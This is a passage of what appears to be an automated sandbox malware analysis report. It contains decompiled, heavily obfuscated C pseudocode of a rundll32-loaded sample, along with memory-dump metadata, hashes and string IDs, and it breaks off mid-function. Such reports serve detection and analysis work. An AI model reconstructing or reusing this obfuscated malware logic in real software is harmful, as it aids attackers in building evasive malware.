                                                                                                                    				_v72 = _v72 + 0x71a1;
                                                                                                                    				_v72 = _v72 + 0x1749;
                                                                                                                    				_v72 = _v72 ^ 0x0028bc49;
                                                                                                                    				_v32 = 0x96c762;
                                                                                                                    				_t193 = 0x44;
                                                                                                                    				_v32 = _v32 / _t193;
                                                                                                                    				_v32 = _v32 ^ 0x000b5918;
                                                                                                                    				_v76 = 0x2f082c;
                                                                                                                    				_v76 = _v76 + 0x52f3;
                                                                                                                    				_v76 = _v76 + 0x7ae4;
                                                                                                                    				_v76 = _v76 ^ 0x81d2744f;
                                                                                                                    				_v76 = _v76 ^ 0x81f68fa5;
                                                                                                                    				_v36 = 0x9357ce;
                                                                                                                    				_v36 = _v36 + 0xfffffb26;
                                                                                                                    				_v36 = _v36 ^ 0x009b03e6;
                                                                                                                    				do {
                                                                                                                    					while(_t196 != 0x4d42949) {
                                                                                                                    						if(_t196 == 0x5adc597) {
                                                                                                                    							_t196 = 0x4d42949;
                                                                                                                    							continue;
                                                                                                                    						} else {
                                                                                                                    							if(_t196 == 0x78e32ab) {
                                                                                                                    								E0034847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
                                                                                                                    							} else {
                                                                                                                    								if(_t196 != 0xf2775cd) {
                                                                                                                    									goto L11;
                                                                                                                    								} else {
                                                                                                                    									_push(_t196);
                                                                                                                    									_push(_t196);
                                                                                                                    									_t214 = E00337FF2(_v20 + _v20);
                                                                                                                    									if(_t214 != 0) {
                                                                                                                    										_t196 = 0x78e32ab;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L14:
                                                                                                                    						return _t214;
                                                                                                                    					}
                                                                                                                    					_t179 = E0034847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
                                                                                                                    					_t217 =  &(_t217[8]);
                                                                                                                    					if(_t179 == 0) {
                                                                                                                    						_t196 = 0xc32537b;
                                                                                                                    						goto L11;
                                                                                                                    					} else {
                                                                                                                    						_t196 = 0xf2775cd;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					goto L14;
                                                                                                                    					L11:
                                                                                                                    				} while (_t196 != 0xc32537b);
                                                                                                                    				goto L14;
                                                                                                                    			}




































                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: -e$62$?M'$h\c$z
                                                                                                                    • API String ID: 0-1842174784
                                                                                                                    • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                    • Instruction ID: 028ef9239f9a6d87590fe09684fffa14b4bbb6a64c2b1cdb99ea84b23aed769d
                                                                                                                    • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                    • Instruction Fuzzy Hash: F3812F715093819FD3A8CF65C58991FBBF5FBC9758F408A0CF2958A260D3B6DA088F42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E0034BE27(intOrPtr* __ecx) {
                                                                                                                    				signed int _v8;
                                                                                                                    				signed int _v12;
                                                                                                                    				signed int _v16;
                                                                                                                    				signed int _v20;
                                                                                                                    				signed int _v24;
                                                                                                                    				signed int _v28;
                                                                                                                    				signed int _v32;
                                                                                                                    				signed int _v36;
                                                                                                                    				signed int _v40;
                                                                                                                    				signed int _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				char _v320;
                                                                                                                    				char _t133;
                                                                                                                    				signed int _t136;
                                                                                                                    				void* _t139;
                                                                                                                    				signed int _t141;
                                                                                                                    				signed int _t142;
                                                                                                                    				signed int _t143;
                                                                                                                    				char* _t144;
                                                                                                                    				intOrPtr* _t163;
                                                                                                                    				void* _t164;
                                                                                                                    
                                                                                                                    				_v40 = 0x365269;
                                                                                                                    				_v40 = _v40 >> 7;
                                                                                                                    				_v40 = _v40 ^ 0x00099806;
                                                                                                                    				_v16 = 0x620947;
                                                                                                                    				_v16 = _v16 + 0x25da;
                                                                                                                    				_v16 = _v16 | 0xf0dff1a3;
                                                                                                                    				_v16 = _v16 + 0xffff8fd5;
                                                                                                                    				_v16 = _v16 ^ 0xf0f65193;
                                                                                                                    				_v60 = 0x4a6911;
                                                                                                                    				_v60 = _v60 >> 2;
                                                                                                                    				_v60 = _v60 ^ 0x0015bfec;
                                                                                                                    				_v32 = 0xee641f;
                                                                                                                    				_v32 = _v32 ^ 0x54466854;
                                                                                                                    				_v32 = _v32 ^ 0x51df3278;
                                                                                                                    				_v32 = _v32 ^ 0x057124b2;
                                                                                                                    				_v36 = 0x2245a1;
                                                                                                                    				_t163 = __ecx;
                                                                                                                    				_t141 = 0x59;
                                                                                                                    				_v36 = _v36 / _t141;
                                                                                                                    				_t142 = 0x7c;
                                                                                                                    				_v36 = _v36 / _t142;
                                                                                                                    				_v36 = _v36 ^ 0x00022b59;
                                                                                                                    				_v52 = 0x17e728;
                                                                                                                    				_v52 = _v52 << 7;
                                                                                                                    				_v52 = _v52 ^ 0x0bfefc33;
                                                                                                                    				_v24 = 0x5a7c12;
                                                                                                                    				_v24 = _v24 + 0xffff6a30;
                                                                                                                    				_v24 = _v24 + 0xb9bd;
                                                                                                                    				_v24 = _v24 ^ 0x00522d4c;
                                                                                                                    				_v8 = 0x70b293;
                                                                                                                    				_v8 = _v8 ^ 0xb7f64013;
                                                                                                                    				_v8 = _v8 | 0x98950303;
                                                                                                                    				_v8 = _v8 << 0x10;
                                                                                                                    				_v8 = _v8 ^ 0xf38d6f21;
                                                                                                                    				_v28 = 0x5e48e6;
                                                                                                                    				_v28 = _v28 >> 2;
                                                                                                                    				_v28 = _v28 << 0xf;
                                                                                                                    				_v28 = _v28 ^ 0xc917f664;
                                                                                                                    				_v44 = 0xd34be4;
                                                                                                                    				_v44 = _v44 ^ 0x1af04c78;
                                                                                                                    				_v44 = _v44 ^ 0x1a25cf5b;
                                                                                                                    				_v56 = 0x13a2c8;
                                                                                                                    				_v56 = _v56 ^ 0x00107e6c;
                                                                                                                    				_v20 = 0x6acc1;
                                                                                                                    				_t143 = 0x48;
                                                                                                                    				_v20 = _v20 * 0x75;
                                                                                                                    				_v20 = _v20 | 0x5ce04716;
                                                                                                                    				_v20 = _v20 ^ 0xfe39b07b;
                                                                                                                    				_v20 = _v20 ^ 0xa1d6ae77;
                                                                                                                    				_v48 = 0x9d30cb;
                                                                                                                    				_t144 =  &_v320;
                                                                                                                    				_v48 = _v48 / _t143;
                                                                                                                    				_v48 = _v48 ^ 0x00028c5d;
                                                                                                                    				_v12 = 0x456efe;
                                                                                                                    				_v12 = _v12 + 0xffff4082;
                                                                                                                    				_v12 = _v12 >> 1;
                                                                                                                    				_v12 = _v12 ^ 0xdbb5e427;
                                                                                                                    				_v12 = _v12 ^ 0xdb99f5c8;
                                                                                                                    				while(1) {
                                                                                                                    					_t133 =  *_t163;
                                                                                                                    					if(_t133 == 0) {
                                                                                                                    						break;
                                                                                                                    					}
                                                                                                                    					if(_t133 == 0x2e) {
                                                                                                                    						 *_t144 = 0;
                                                                                                                    					} else {
                                                                                                                    						 *_t144 = _t133;
                                                                                                                    						_t144 = _t144 + 1;
                                                                                                                    						_t163 = _t163 + 1;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					L6:
                                                                                                                    					_t164 = E0033ADE6(_v40, _v16,  &_v320, _v60);
                                                                                                                    					if(_t164 != 0) {
                                                                                                                    						L8:
                                                                                                                    						_t136 = E0034DBEA(_t163 + 1, _v8, _v28, _v44);
                                                                                                                    						_push(_v12);
                                                                                                                    						_push(_t136 ^ 0x2ac2611c);
                                                                                                                    						_push(_v48);
                                                                                                                    						_push(_t164);
                                                                                                                    						return E0033CDCD(_v56, _v20);
                                                                                                                    					}
                                                                                                                    					_t139 = E0034CADF(_v32,  &_v320, _v36, _v52);
                                                                                                                    					_t164 = _t139;
                                                                                                                    					if(_t164 != 0) {
                                                                                                                    						goto L8;
                                                                                                                    					}
                                                                                                                    					return _t139;
                                                                                                                    				}
                                                                                                                    				goto L6;
                                                                                                                    			}




























                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                    • API String ID: 0-1567385930
                                                                                                                    • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                    • Instruction ID: 9b3f0498c053cd48f8fbbef732a85d26a2af725a0ec0cac0c9045b4615587346
                                                                                                                    • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                    • Instruction Fuzzy Hash: D5513371C05219EBDF49CFA4D94A8EEFBB1FF04314F208159D411BA260C3B52A59CF94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                    • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                    • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                    • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                    • SendMessageA.USER32 ref: 1001B48B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: State$LongMessageSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1063413437-0
                                                                                                                    • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                    • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                    • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                    • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E003420BA() {
                                                                                                                    				char _v520;
                                                                                                                    				signed int _v524;
                                                                                                                    				unsigned int _v528;
                                                                                                                    				signed int _v532;
                                                                                                                    				signed int _v536;
                                                                                                                    				signed int _v540;
                                                                                                                    				signed int _v544;
                                                                                                                    				signed int _v548;
                                                                                                                    				signed int _v552;
                                                                                                                    				signed int _v556;
                                                                                                                    				signed int _v560;
                                                                                                                    				signed int _v564;
                                                                                                                    				signed int _v568;
                                                                                                                    				signed int _v572;
                                                                                                                    				signed int _v576;
                                                                                                                    				signed int _v580;
                                                                                                                    				signed int _v584;
                                                                                                                    				signed int _v588;
                                                                                                                    				signed int _v592;
                                                                                                                    				signed int _v596;
                                                                                                                    				signed int _v600;
                                                                                                                    				signed int _v604;
                                                                                                                    				signed int _v608;
                                                                                                                    				signed int _v612;
                                                                                                                    				signed int _v616;
                                                                                                                    				signed int _v620;
                                                                                                                    				signed int _v624;
                                                                                                                    				signed int _t227;
                                                                                                                    				intOrPtr _t228;
                                                                                                                    				signed int _t230;
                                                                                                                    				void* _t231;
                                                                                                                    				intOrPtr _t235;
                                                                                                                    				intOrPtr _t245;
                                                                                                                    				void* _t247;
                                                                                                                    				intOrPtr _t254;
                                                                                                                    				signed int _t272;
                                                                                                                    				signed int _t273;
                                                                                                                    				signed int _t274;
                                                                                                                    				signed int _t275;
                                                                                                                    				void* _t277;
                                                                                                                    				signed int* _t279;
                                                                                                                    				void* _t283;
                                                                                                                    
                                                                                                                    				_t279 =  &_v624;
                                                                                                                    				_v612 = 0x15bebb;
                                                                                                                    				_v612 = _v612 ^ 0x0c09d82a;
                                                                                                                    				_t247 = 0x7e01d7;
                                                                                                                    				_v612 = _v612 + 0xffff69e9;
                                                                                                                    				_v612 = _v612 ^ 0xcffb1e8d;
                                                                                                                    				_v612 = _v612 ^ 0xc3e0ceeb;
                                                                                                                    				_v596 = 0xb5bc7f;
                                                                                                                    				_v596 = _v596 << 0xa;
                                                                                                                    				_v596 = _v596 + 0xbaa7;
                                                                                                                    				_v596 = _v596 ^ 0xd6f2b68e;
                                                                                                                    				_v600 = 0x5909af;
                                                                                                                    				_v600 = _v600 ^ 0x0096463d;
                                                                                                                    				_v600 = _v600 >> 3;
                                                                                                                    				_v600 = _v600 ^ 0x0016e9cd;
                                                                                                                    				_v548 = 0x801d18;
                                                                                                                    				_v548 = _v548 + 0xffffc800;
                                                                                                                    				_v548 = _v548 ^ 0x0070ca5a;
                                                                                                                    				_v580 = 0x2361dd;
                                                                                                                    				_v580 = _v580 * 0x6f;
                                                                                                                    				_t277 = 0;
                                                                                                                    				_v580 = _v580 << 0xe;
                                                                                                                    				_v580 = _v580 ^ 0xdbb34e1e;
                                                                                                                    				_v528 = 0x864281;
                                                                                                                    				_v528 = _v528 >> 0xc;
                                                                                                                    				_v528 = _v528 ^ 0x0000b217;
                                                                                                                    				_v560 = 0x478502;
                                                                                                                    				_v560 = _v560 | 0x3d47d1eb;
                                                                                                                    				_v560 = _v560 ^ 0x3d4c1a49;
                                                                                                                    				_v540 = 0x8f961f;
                                                                                                                    				_v540 = _v540 >> 0xc;
                                                                                                                    				_v540 = _v540 ^ 0x000d133d;
                                                                                                                    				_v572 = 0xef4b2;
                                                                                                                    				_v572 = _v572 << 0xd;
                                                                                                                    				_v572 = _v572 + 0xffff85b1;
                                                                                                                    				_v572 = _v572 ^ 0xde949f86;
                                                                                                                    				_v608 = 0x8e969a;
                                                                                                                    				_v608 = _v608 << 0xd;
                                                                                                                    				_t272 = 0x21;
                                                                                                                    				_v608 = _v608 / _t272;
                                                                                                                    				_t273 = 0x2f;
                                                                                                                    				_v608 = _v608 / _t273;
                                                                                                                    				_v608 = _v608 ^ 0x002a10b8;
                                                                                                                    				_v620 = 0x864bbd;
                                                                                                                    				_v620 = _v620 << 0x10;
                                                                                                                    				_v620 = _v620 + 0x87ba;
                                                                                                                    				_v620 = _v620 + 0x936f;
                                                                                                                    				_v620 = _v620 ^ 0x4bb78bcc;
                                                                                                                    				_v564 = 0xfb8a17;
                                                                                                                    				_t274 = 0x62;
                                                                                                                    				_v564 = _v564 * 0x63;
                                                                                                                    				_v564 = _v564 ^ 0x61429d97;
                                                                                                                    				_v576 = 0x222f;
                                                                                                                    				_v576 = _v576 >> 4;
                                                                                                                    				_v576 = _v576 ^ 0xf39884cf;
                                                                                                                    				_v576 = _v576 ^ 0xf39d4647;
                                                                                                                    				_v556 = 0x6068cb;
                                                                                                                    				_v556 = _v556 ^ 0xfe1a734d;
                                                                                                                    				_v556 = _v556 ^ 0xfe79d9b4;
                                                                                                                    				_v616 = 0xc46e23;
                                                                                                                    				_v616 = _v616 >> 2;
                                                                                                                    				_v616 = _v616 / _t274;
                                                                                                                    				_v616 = _v616 * 0x76;
                                                                                                                    				_v616 = _v616 ^ 0x003e2a5a;
                                                                                                                    				_v624 = 0x4617e4;
                                                                                                                    				_v624 = _v624 + 0xffff4d74;
                                                                                                                    				_v624 = _v624 ^ 0x9dcdfd87;
                                                                                                                    				_v624 = _v624 + 0x3fd8;
                                                                                                                    				_v624 = _v624 ^ 0x9d89a5c2;
                                                                                                                    				_v588 = 0x3a0167;
                                                                                                                    				_v588 = _v588 << 1;
                                                                                                                    				_v588 = _v588 + 0xffff1a51;
                                                                                                                    				_v588 = _v588 ^ 0x00728a40;
                                                                                                                    				_v532 = 0x3a363e;
                                                                                                                    				_v532 = _v532 ^ 0xe52a74a2;
                                                                                                                    				_v532 = _v532 ^ 0xe514694b;
                                                                                                                    				_v544 = 0x52d5cb;
                                                                                                                    				_v544 = _v544 | 0x185d0a08;
                                                                                                                    				_v544 = _v544 ^ 0x18524fe5;
                                                                                                                    				_v584 = 0x37b3aa;
                                                                                                                    				_v584 = _v584 + 0xebef;
                                                                                                                    				_t275 = 0x72;
                                                                                                                    				_v584 = _v584 * 0x28;
                                                                                                                    				_v584 = _v584 ^ 0x08d0b087;
                                                                                                                    				_v592 = 0xa4bebe;
                                                                                                                    				_v592 = _v592 >> 8;
                                                                                                                    				_v592 = _v592 | 0x739fbd45;
                                                                                                                    				_v592 = _v592 ^ 0x739593e3;
                                                                                                                    				_v552 = 0x17b1c;
                                                                                                                    				_v552 = _v552 << 0xe;
                                                                                                                    				_v552 = _v552 ^ 0x5ecd7403;
                                                                                                                    				_v568 = 0x403d75;
                                                                                                                    				_v568 = _v568 >> 3;
                                                                                                                    				_v568 = _v568 | 0x80b15bc0;
                                                                                                                    				_v568 = _v568 ^ 0x80b9a416;
                                                                                                                    				_v536 = 0x2ed64e;
                                                                                                                    				_t276 = _v524;
                                                                                                                    				_v536 = _v536 / _t275;
                                                                                                                    				_v536 = _v536 ^ 0x00033d67;
                                                                                                                    				_v604 = 0x8b403d;
                                                                                                                    				_v604 = _v604 + 0xffff3866;
                                                                                                                    				_v604 = _v604 << 8;
                                                                                                                    				_v604 = _v604 ^ 0x8a7a6cd3;
                                                                                                                    				goto L1;
                                                                                                                    				do {
                                                                                                                    					while(1) {
                                                                                                                    						L1:
                                                                                                                    						_t283 = _t247 - 0x73dad95;
                                                                                                                    						if(_t283 > 0) {
                                                                                                                    							break;
                                                                                                                    						}
                                                                                                                    						if(_t283 == 0) {
                                                                                                                    							E0034DA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
                                                                                                                    							_t235 = E00332051(_v536,  &_v520, _v604);
                                                                                                                    							_t254 =  *0x353e10; // 0x0
                                                                                                                    							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
                                                                                                                    						} else {
                                                                                                                    							if(_t247 == 0x7e01d7) {
                                                                                                                    								_push(_t247);
                                                                                                                    								_push(_t247);
                                                                                                                    								 *0x353e10 = E00337FF2(0x45c);
                                                                                                                    								_t247 = 0x8643fcd;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t247 == 0xd34913) {
                                                                                                                    									_t247 = 0x148c4fa;
                                                                                                                    									_v524 = _v596;
                                                                                                                    									continue;
                                                                                                                    								} else {
                                                                                                                    									if(_t247 == 0xfeb697) {
                                                                                                                    										_v524 = _v612;
                                                                                                                    										goto L8;
                                                                                                                    									} else {
                                                                                                                    										if(_t247 != 0x148c4fa) {
                                                                                                                    											goto L20;
                                                                                                                    										} else {
                                                                                                                    											E00348F9E(_v620, _v564, _v576, _v556, _t276);
                                                                                                                    											_t279 =  &(_t279[3]);
                                                                                                                    											L8:
                                                                                                                    											_t247 = 0xac90332;
                                                                                                                    											continue;
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L23:
                                                                                                                    						return _t277;
                                                                                                                    					}
                                                                                                                    					__eflags = _t247 - 0x8643fcd;
                                                                                                                    					if(_t247 == 0x8643fcd) {
                                                                                                                    						_t227 = E0033912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
                                                                                                                    						_t276 = _t227;
                                                                                                                    						_t279 =  &(_t279[5]);
                                                                                                                    						__eflags = _t227;
                                                                                                                    						if(__eflags == 0) {
                                                                                                                    							_t247 = 0xfeb697;
                                                                                                                    							goto L20;
                                                                                                                    						} else {
                                                                                                                    							_t245 =  *0x353e10; // 0x0
                                                                                                                    							 *((intOrPtr*)(_t245 + 0x450)) = 1;
                                                                                                                    							_t247 = 0xd34913;
                                                                                                                    							goto L1;
                                                                                                                    						}
                                                                                                                    					} else {
                                                                                                                    						__eflags = _t247 - 0xac90332;
                                                                                                                    						if(_t247 == 0xac90332) {
                                                                                                                    							_push(_v532);
                                                                                                                    							_push(_v524);
                                                                                                                    							_push(_v588);
                                                                                                                    							_t228 =  *0x353e10; // 0x0
                                                                                                                    							_push(_t228 + 0x23c);
                                                                                                                    							_t230 = E003446BB(_v616, _v624);
                                                                                                                    							_t279 = _t279 - 0xc + 0x1c;
                                                                                                                    							_t247 = 0xe2d9513;
                                                                                                                    							__eflags = _t230;
                                                                                                                    							_t231 = 1;
                                                                                                                    							_t277 =  ==  ? _t231 : _t277;
                                                                                                                    							goto L1;
                                                                                                                    						} else {
                                                                                                                    							__eflags = _t247 - 0xe2d9513;
                                                                                                                    							if(_t247 != 0xe2d9513) {
                                                                                                                    								goto L20;
                                                                                                                    							} else {
                                                                                                                    								E0033A55F();
                                                                                                                    								_t247 = 0x73dad95;
                                                                                                                    								goto L1;
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					goto L23;
                                                                                                                    					L20:
                                                                                                                    					__eflags = _t247 - 0x13a2d4a;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L23;
                                                                                                                    			}
                                                                                                                    0x003422f5
                                                                                                                    0x003422fd
                                                                                                                    0x00342305
                                                                                                                    0x0034230d
                                                                                                                    0x00342315
                                                                                                                    0x0034231d
                                                                                                                    0x0034232c
                                                                                                                    0x0034232d
                                                                                                                    0x00342331
                                                                                                                    0x00342339
                                                                                                                    0x00342341
                                                                                                                    0x00342346
                                                                                                                    0x0034234e
                                                                                                                    0x00342356
                                                                                                                    0x0034235e
                                                                                                                    0x00342363
                                                                                                                    0x0034236b
                                                                                                                    0x00342373
                                                                                                                    0x00342378
                                                                                                                    0x00342380
                                                                                                                    0x00342388
                                                                                                                    0x00342396
                                                                                                                    0x0034239a
                                                                                                                    0x0034239e
                                                                                                                    0x003423a6
                                                                                                                    0x003423ae
                                                                                                                    0x003423b6
                                                                                                                    0x003423bb
                                                                                                                    0x003423bb
                                                                                                                    0x003423c3
                                                                                                                    0x003423c3
                                                                                                                    0x003423c3
                                                                                                                    0x003423c3
                                                                                                                    0x003423c5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003423cb
                                                                                                                    0x00342519
                                                                                                                    0x00342532
                                                                                                                    0x00342537
                                                                                                                    0x00342540
                                                                                                                    0x003423d1
                                                                                                                    0x003423d7
                                                                                                                    0x0034243c
                                                                                                                    0x0034243d
                                                                                                                    0x00342445
                                                                                                                    0x0034244a
                                                                                                                    0x00000000
                                                                                                                    0x003423d9
                                                                                                                    0x003423df
                                                                                                                    0x00342420
                                                                                                                    0x00342425
                                                                                                                    0x00000000
                                                                                                                    0x003423e1
                                                                                                                    0x003423e7
                                                                                                                    0x00342416
                                                                                                                    0x00000000
                                                                                                                    0x003423e9
                                                                                                                    0x003423ef
                                                                                                                    0x00000000
                                                                                                                    0x003423f5
                                                                                                                    0x00342406
                                                                                                                    0x0034240b
                                                                                                                    0x0034240e
                                                                                                                    0x0034240e
                                                                                                                    0x00000000
                                                                                                                    0x0034240e
                                                                                                                    0x003423ef
                                                                                                                    0x003423e7
                                                                                                                    0x003423df
                                                                                                                    0x003423d7
                                                                                                                    0x00342544
                                                                                                                    0x0034254f
                                                                                                                    0x0034254f
                                                                                                                    0x00342454
                                                                                                                    0x0034245a
                                                                                                                    0x003424ca
                                                                                                                    0x003424cf
                                                                                                                    0x003424d1
                                                                                                                    0x003424d4
                                                                                                                    0x003424d6
                                                                                                                    0x003424f0
                                                                                                                    0x00000000
                                                                                                                    0x003424d8
                                                                                                                    0x003424d8
                                                                                                                    0x003424e0
                                                                                                                    0x003424e6
                                                                                                                    0x00000000
                                                                                                                    0x003424e6
                                                                                                                    0x0034245c
                                                                                                                    0x0034245c
                                                                                                                    0x0034245e
                                                                                                                    0x00342478
                                                                                                                    0x0034247c
                                                                                                                    0x00342480
                                                                                                                    0x00342484
                                                                                                                    0x00342499
                                                                                                                    0x0034249a
                                                                                                                    0x0034249f
                                                                                                                    0x003424a2
                                                                                                                    0x003424a7
                                                                                                                    0x003424ab
                                                                                                                    0x003424ac
                                                                                                                    0x00000000
                                                                                                                    0x00342460
                                                                                                                    0x00342460
                                                                                                                    0x00342466
                                                                                                                    0x00000000
                                                                                                                    0x0034246c
                                                                                                                    0x0034246c
                                                                                                                    0x00342471
                                                                                                                    0x00000000
                                                                                                                    0x00342471
                                                                                                                    0x00342466
                                                                                                                    0x0034245e
                                                                                                                    0x00000000
                                                                                                                    0x003424f5
                                                                                                                    0x003424f5
                                                                                                                    0x003424f5
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: /"$>6:$Z*>$u=@
                                                                                                                    • API String ID: 0-89199335
                                                                                                                    • Opcode ID: 1516b9e4940213b40ca1d5d59d1a78bd2dccdc1a20b0bc87960f9bb7b6a359ba
                                                                                                                    • Instruction ID: 2fb3a190a757e394101b324fa5f046b667a991c8f15d889260acce31ad1a9ecb
                                                                                                                    • Opcode Fuzzy Hash: 1516b9e4940213b40ca1d5d59d1a78bd2dccdc1a20b0bc87960f9bb7b6a359ba
                                                                                                                    • Instruction Fuzzy Hash: 18B101721083809FC369CF66C48A81BFBF1FBD4748F50991DF6A29A261D3B59949CF42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E003466CA() {
                                                                                                                    				char _v520;
                                                                                                                    				char _v1040;
                                                                                                                    				signed int _v1044;
                                                                                                                    				intOrPtr _v1048;
                                                                                                                    				intOrPtr _v1052;
                                                                                                                    				intOrPtr _v1056;
                                                                                                                    				unsigned int _v1060;
                                                                                                                    				signed int _v1064;
                                                                                                                    				signed int _v1068;
                                                                                                                    				signed int _v1072;
                                                                                                                    				signed int _v1076;
                                                                                                                    				signed int _v1080;
                                                                                                                    				signed int _v1084;
                                                                                                                    				signed int _v1088;
                                                                                                                    				signed int _v1092;
                                                                                                                    				signed int _v1096;
                                                                                                                    				signed int _v1100;
                                                                                                                    				signed int _v1104;
                                                                                                                    				signed int _v1108;
                                                                                                                    				signed int _v1112;
                                                                                                                    				signed int _v1116;
                                                                                                                    				signed int _v1120;
                                                                                                                    				signed int _v1124;
                                                                                                                    				signed int _v1128;
                                                                                                                    				signed int _v1132;
                                                                                                                    				signed int _v1136;
                                                                                                                    				signed int _v1140;
                                                                                                                    				signed int _v1144;
                                                                                                                    				signed int _v1148;
                                                                                                                    				signed int _v1152;
                                                                                                                    				signed int _v1156;
                                                                                                                    				signed int _v1160;
                                                                                                                    				signed int _v1164;
                                                                                                                    				void* _t263;
                                                                                                                    				void* _t264;
                                                                                                                    				intOrPtr _t265;
                                                                                                                    				void* _t268;
                                                                                                                    				void* _t269;
                                                                                                                    				signed int _t272;
                                                                                                                    				signed int _t273;
                                                                                                                    				signed int _t274;
                                                                                                                    				signed int _t275;
                                                                                                                    				intOrPtr _t282;
                                                                                                                    				intOrPtr _t289;
                                                                                                                    				intOrPtr _t306;
                                                                                                                    				void* _t310;
                                                                                                                    				signed int* _t314;
                                                                                                                    
                                                                                                                    				_t314 =  &_v1164;
                                                                                                                    				_v1044 = _v1044 & 0x00000000;
                                                                                                                    				_v1056 = 0xc409ba;
                                                                                                                    				_v1052 = 0xa85c92;
                                                                                                                    				_v1048 = 0x441ffc;
                                                                                                                    				_v1160 = 0xafc02f;
                                                                                                                    				_v1160 = _v1160 + 0xffff4fb0;
